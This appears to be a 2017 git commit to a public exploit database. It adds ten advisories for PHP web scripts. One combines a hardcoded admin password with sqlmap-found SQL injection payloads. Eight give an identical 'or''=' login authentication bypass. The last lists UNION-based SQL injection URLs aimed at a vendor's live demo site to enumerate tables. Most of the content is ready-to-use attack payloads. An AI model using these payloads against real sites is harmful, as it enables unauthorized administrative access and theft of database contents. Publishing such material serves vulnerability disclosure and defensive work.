DB: 2017-01-21

10 new exploits Complain Management System - SQL injection ICGames-Games Site Script 1.2 - Authentication Bypass Domains Marketplace Script 1.1 - Authentication Bypass ICTutors Tutoring Site Script 1.1 - Authentication Bypass Mini Blog 1.1 - Authentication Bypass Job Site PHP Script 1.1 - Authentication Bypass Music Site Script 1.2 - Authentication Bypass Affiliate Tracking Script 1.1 - Authentication Bypass Mini CMS 1.1 - Authentication Bypass B2B Alibaba Clone Script - SQL Injection
2017-01-21 05:01:18 +00:00 · 2017-01-21 05:01:18 +00:00 · b1b494f790
commit b1b494f790
parent 1441edc4aa
11 changed files with 222 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -37063,3 +37063,13 @@ id,file,description,date,author,platform,type,port
 41125,platforms/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
 41126,platforms/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
 41127,platforms/php/webapps/41127.txt,"Classifieds Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41131,platforms/php/webapps/41131.txt,"Complain Management System - SQL injection",2017-01-20,"Sibusiso Sishi",php,webapps,0
+41132,platforms/php/webapps/41132.txt,"ICGames-Games Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41133,platforms/php/webapps/41133.txt,"Domains Marketplace Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41134,platforms/php/webapps/41134.txt,"ICTutors Tutoring Site Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41135,platforms/php/webapps/41135.txt,"Mini Blog 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41136,platforms/php/webapps/41136.txt,"Job Site PHP Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
+41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/41131.txt
+++ b/platforms/php/webapps/41131.txt
@ -0,0 +1,51 @@
+# Title : Complain Management System SQL Injection
+# Date: 20 January 2017
+# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
+# Tested on: Windows7 x32
+# Vendor: https://sourceforge.net/projects/complain-management-system/
+# Version: not supplied
+# Download Software: https://sourceforge.net/projects/complain-management-system/files
+ 
+#################################################
+
+## About The Product : ##
+Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.
+
+## Vulnerability : ## 
+The functions.php file line 88 has hardcoded admin credentials.
+		elseif($uType == 'admin'){
+			//$_SESSION['user_id'] = $row['sid'];
+			if($userName == 'admin' && $password == 'admin123'){
+				$_SESSION['user_id'] = 0;
+				$_SESSION['user_name'] = 'Administrator';
+				$_SESSION['user_type'] = 'admin';
+				header('Location: '.WEB_ROOT.'index.php');
+				exit;
+
+Using the hardcoded admin credentials we then have access to the process.php file that is vulnerable to SQL injection.
+
+-HTTP Method : GET
+
+- Sqlmap command: sqlmap -u "http://192.168.19.135/cms/process.php?action=deleteCust&cId=123" --cookie="PHPSESSID=q446r5fqav1qlljb7cohd29r85"
+
+- Sqlmap Output : 
+sqlmap identified the following injection point(s) with a total of 622 HTTP(s) requests:
+---
+Parameter: cId (GET)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: action=deleteCust&cId=123 RLIKE (SELECT (CASE WHEN (8336=8336) THEN 123 ELSE 0x28 END))
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: action=deleteCust&cId=123 AND EXTRACTVALUE(8194,CONCAT(0x5c,0x7171706a71,(SELECT (ELT(8194=8194,1))),0x716a6b6271))
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: action=deleteCust&cId=123 AND (SELECT * FROM (SELECT(SLEEP(5)))fdmM)
+---
+[22:54:32] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows
+web application technology: Apache 2.4.23, PHP 5.6.24
+back-end DBMS: MySQL >= 5.1
+
--- a/platforms/php/webapps/41132.txt
+++ b/platforms/php/webapps/41132.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: ICGames-Games Site Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/games-site-script.htm
+# Demo: http://www.icloudcenter.net/demos/icgames/
+# Version: 1.2
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41133.txt
+++ b/platforms/php/webapps/41133.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: ICDomains-Domains Marketplace Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/domains-marketplace-script.htm
+# Demo: http://icloudcenter.net/demos/icdomains/
+# Version: 1.1
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41134.txt
+++ b/platforms/php/webapps/41134.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: ICTutors-Tutoring Site Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/tutoring-site-script.htm
+# Demo: http://www.icloudcenter.net/demos/ictutors/
+# Version: 1.1
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41135.txt
+++ b/platforms/php/webapps/41135.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: IC-Mini Blog Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/mini_blog.htm
+# Demo: http://www.icloudcenter.net/demos/mini_blog/
+# Version: 1.1
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41136.txt
+++ b/platforms/php/webapps/41136.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: ICJobSite-Job Site PHP Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/jobs-site-script.htm
+# Demo: http://icloudcenter.net/demos/icjobsite/
+# Version: 1.1
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41137.txt
+++ b/platforms/php/webapps/41137.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: ICMusic - Music Site Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/music-site-script.htm
+# Demo: http://icloudcenter.net/demos/icmusic/
+# Version: 1.2
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41138.txt
+++ b/platforms/php/webapps/41138.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: ICAffiliateTracking - Affiliate Tracking Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/affiliates-tracking-script.htm
+# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
+# Version: 1.2
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/adminlogin.asp and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41139.txt
+++ b/platforms/php/webapps/41139.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: IC-Mini CMS Script - Authentication Bypass
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Buy: http://www.icloudcenter.com/mini_cms.htm
+# Demo: http://www.icloudcenter.net/demos/mini_cms/
+# Version: 1.1
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]//index.php?page=login and set Username and Password to 'or''=' and hit enter.
+# # # # #
--- a/platforms/php/webapps/41140.txt
+++ b/platforms/php/webapps/41140.txt
@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: B2B Alibaba Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 20.01.2017
+# Vendor Homepage: https://www.clonescriptsoft.com/
+# Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone
+# Demo: http://alibaba.clonescriptsoft.com/
+# Version: N/A
+# Tested on: Win7 x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/category.php?IndustryID=[SQL]
+# E.t.c....
+# # # # #
+
+
+SQL Injection
+http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version()
+
+http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
+